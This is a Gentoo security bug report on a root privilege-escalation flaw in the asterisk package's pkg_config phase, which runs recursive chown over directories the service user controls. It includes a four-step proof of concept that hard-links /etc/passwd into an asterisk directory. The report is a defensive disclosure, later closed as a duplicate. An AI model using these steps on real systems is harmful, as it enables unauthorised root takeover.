Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!

Bug 630918

Summary: net-misc/asterisk: root privilege escalation via "chown -R" in pkg_config
Product: Gentoo Security Reporter: Michael Orlitzky <mjo>
Component: AuditingAssignee: Gentoo Security <security>
Status: RESOLVED DUPLICATE    
Severity: normal CC: jaco, proxy-maint, security-audit
Priority: Normal    
Version: unspecified   
Hardware: All   
OS: Linux   
Whiteboard:
Package list:
Runtime testing required: ---

Description Michael Orlitzky gentoo-dev 2017-09-13 18:25:16 UTC
The asterisk ebuilds call "chown -R" on a few directories during the pkg_config phase:

  pkg_config() {
      ...
      for x in spool run lib log; do
          chown -R asterisk:asterisk "${ROOT}"var/${x}/asterisk
          chmod -R u=rwX,g=rwX,o=    "${ROOT}"var/${x}/asterisk
      done

      chown -R root:asterisk  "${ROOT}"etc/asterisk
      chmod -R u=rwX,g=rwX,o= "${ROOT}"etc/asterisk

This can be exploited by the "asterisk" user to gain root. If he places a hard link to a root-owned file in any of those directories, then the next time pkg_config is run, it will give ownership of root's file to the "asterisk" user. For example,

  1. emerge asterisk
  2. su -s /bin/sh -c 'ln /etc/passwd /var/lib/asterisk/x' asterisk
  3. emerge --config asterisk
  4. /etc/passwd is owned by asterisk:asterisk
Comment 1 Robin Johnson archtester Gentoo Infrastructure gentoo-dev Security 2020-04-03 23:16:33 UTC
Unrestricting and reassigning to security@ per bug #705894
Comment 2 Robin Johnson archtester Gentoo Infrastructure gentoo-dev Security 2020-04-03 23:18:01 UTC
unrestricting per bug 705894
Comment 3 Sam James archtester gentoo-dev Security 2020-05-21 22:22:56 UTC
I think this was resolved at the same time as bug 602722.

@jaco, is that right?
Comment 4 Jaco Kroon 2020-05-22 07:04:45 UTC
(In reply to Sam James (sec padawan) from comment #3)
> I think this was resolved at the same time as bug 602722.
> 
> @jaco, is that right?

Duplicate yes.

*** This bug has been marked as a duplicate of bug 602722 ***